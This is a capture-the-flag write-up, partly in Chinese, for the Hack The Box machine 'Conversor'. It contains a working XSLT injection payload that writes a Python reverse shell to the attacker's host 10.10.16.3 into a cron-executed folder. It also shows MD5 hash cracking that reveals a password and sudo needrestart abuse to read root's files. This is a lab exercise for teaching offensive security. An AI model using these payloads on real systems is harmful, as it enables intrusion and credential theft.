# Hack The Box - Conversor Writeup Writeup for the box Conversor in Hack The Box. ## Box Info | Name | OS | Difficulty | |:--------- | ----- |:---------- | | Conversor | Linux | Easy | ## Recon ### Nmap ```bash ┌──(parallels㉿kali)-[~/Documents/Hack The Box/Conversor] └─$ sudo nmap 10.10.11.92 -oA nmap/initial Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-10 14:29 CST Nmap scan report for 10.10.11.92 Host is up (0.99s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http ``` ```bash ┌──(parallels㉿kali)-[~/Documents/Hack The Box/Conversor] └─$ sudo nmap 10.10.11.92 -p22,80 -sC -sV -oA nmap/conversor Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-10 14:33 CST Nmap scan report for 10.10.11.92 Host is up (0.25s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 01:74:26:39:47:bc:6a:e2:cb:12:8b:71:84:9c:f8:5a (ECDSA) |_ 256 3a:16:90:dc:74:d8:e3:c4:51:36:e2:08:06:26:17:ee (ED25519) 80/tcp open http Apache httpd 2.4.52 |_http-server-header: Apache/2.4.52 (Ubuntu) |_http-title: Did not follow redirect to http://conversor.htb/ Service Info: Host: conversor.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 22.79 seconds ``` 將域名加到 host 檔中： ```bash ┌──(parallels㉿kali)-[~/Documents/Hack The Box/Conversor] └─$ echo "\n10.10.11.92 conversor.htb" | sudo tee -a /etc/hosts 10.10.11.92 conversor.htb ``` ### Web Service - Port 80 進到網站後會看到登入頁面：  Home page 可以上傳 xml 和 xslt 檔來將 nmap 執行結果轉換為 html：  About page 則是可以下載 source code：  ## Shell as www-data 查看 source code 裡面的內容，從 `install.md` 可以知道網站可能定時執行 `/scripts` 底下的所有 python script： ```markdown If you want to run Python scripts (for example, our server deletes all files older than 60 minutes to avoid system overload), you can add the following line to your /etc/crontab. """ * * * * * www-data for f in /var/www/conversor.htb/scripts/*.py; do python3 "$f"; done """ ``` 而從 `app.py` 中可以看到程式會去解析 xslt 檔案，並且沒有做相關防護： ```python <SNIP> from lxml import etree xml_path = os.path.join(UPLOAD_FOLDER, xml_file.filename) xslt_path = os.path.join(UPLOAD_FOLDER, xslt_file.filename) xml_file.save(xml_path) xslt_file.save(xslt_path) try: parser = etree.XMLParser(resolve_entities=False, no_network=True, dtd_validation=False, load_dtd=False) xml_tree = etree.parse(xml_path, parser) xslt_tree = etree.parse(xslt_path) <SNIP> ``` 嘗試 xslt injection： ```xml <?xml version="1.0" encoding="UTF-8"?> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:output method="html" indent="yes"/> <xsl:template match="/"> <html> <body> <br/>Version: <xsl:value-of select="system-property('xsl:version')"/> <br/>Vendor: <xsl:value-of select="system-property('xsl:vendor')"/> <br/>Vendor URL: <xsl:value-of select="system-property('xsl:vendor-url')"/> </body> </html> </xsl:template> </xsl:stylesheet> ```  利用 payloads all the things 裡面提供的方法寫入檔案： {%preview https://swisskyrepo.github.io/PayloadsAllTheThings/XSLT%20Injection/?source=post_page-----7d6ff7548746---------------------------------------#write-files-with-exslt-extension %} ```xml <?xml version="1.0" encoding="UTF-8"?> <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:exploit="http://exslt.org/common" extension-element-prefixes="exploit" version="1.0"> <xsl:template match="/"> <exploit:document href="/var/www/conversor.htb/scripts/exploit.py" method="text"> import socket,subprocess,os,pty s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("10.10.16.3",9001)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) pty.spawn("/bin/bash") </exploit:document> </xsl:template> </xsl:stylesheet> ``` 接著等待 cron 執行定時任務後就可以成功拿到 shell 了： ```bash ┌──(parallels㉿kali)-[~/Documents/Hack The Box/Conversor] └─$ nc -lvnp 9001 listening on [any] 9001 ... connect to [10.10.16.3] from (UNKNOWN) [10.10.11.92] 42296 www-data@conversor:~$ ``` ## Shell as fismathack ```bash ┌──(parallels㉿kali)-[~/Documents/Hack The Box/Conversor/source_code] └─$ tree . ├── app.py ├── app.wsgi ├── install.md ├── instance │ └── users.db ``` 從 source code 中可以知道 `instance/` 底下有個 `user.db`，查看裡面的資料： ```bash www-data@conversor:~/conversor.htb$ sqlite3 instance/users.db SQLite version 3.37.2 2022-01-06 13:25:41 Enter ".help" for usage hints. sqlite> .tables files users sqlite> select * from users; 1|fismathack|5b5c3ac3a1c897c94caad48e6c71fdec ``` 破解密碼： ```bash ┌──(parallels㉿kali)-[~/Documents/Hack The Box/Conversor/source_code] └─$ hashcat -m 0 5b5c3ac3a1c897c94caad48e6c71fdec /usr/share/wordlists/rockyou.txt hashcat (v6.2.6) starting <SNIP> 5b5c3ac3a1c897c94caad48e6c71fdec:Keepmesafeandwarm ``` 然後就能透過 ssh 登入系統了： ```bash ┌──(parallels㉿kali)-[~/Documents/Hack The Box/Conversor/source_code] └─$ ssh fismathack@10.10.11.92 <SNIP> fismathack@conversor:~$ ``` ### user.txt ```bash fismathack@conversor:~$ cat user.txt e954fe75************************ ``` ## Shell as root 檢查 sudo 權限： ```bash fismathack@conversor:~$ sudo -l Matching Defaults entries for fismathack on conversor: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty User fismathack may run the following commands on conversor: (ALL : ALL) NOPASSWD: /usr/sbin/needrestart ``` 查看 `needrestart` 的 help 訊息： ```bash fismathack@conversor:~$ needrestart --help needrestart 3.7 - Restart daemons after library updates. <SNIP> Usage: needrestart [-vn] [-c <cfg>] [-r <mode>] [-f <fe>] [-u <ui>] [-(b|p|o)] [-klw] -v be more verbose -q be quiet -m <mode> set detail level e (e)asy mode a (a)dvanced mode -n set default answer to 'no' -c <cfg> config filename <SNIP> ``` 嘗試指定 config file 可以發現 `needrestart` 在解析失敗的時候會將內容列印出來： ```bash fismathack@conversor:~$ needrestart -c user.txt Error parsing user.txt: Bareword "e954fe75************************" not allowed while "strict subs" in use at (eval 14) line 1. ``` ### root.txt ```shell fismathack@conversor:~$ sudo needrestart -c /root/root.txt Error parsing /root/root.txt: Bareword "f091c672************************" not allowed while "strict subs" in use at (eval 14) line 1. ```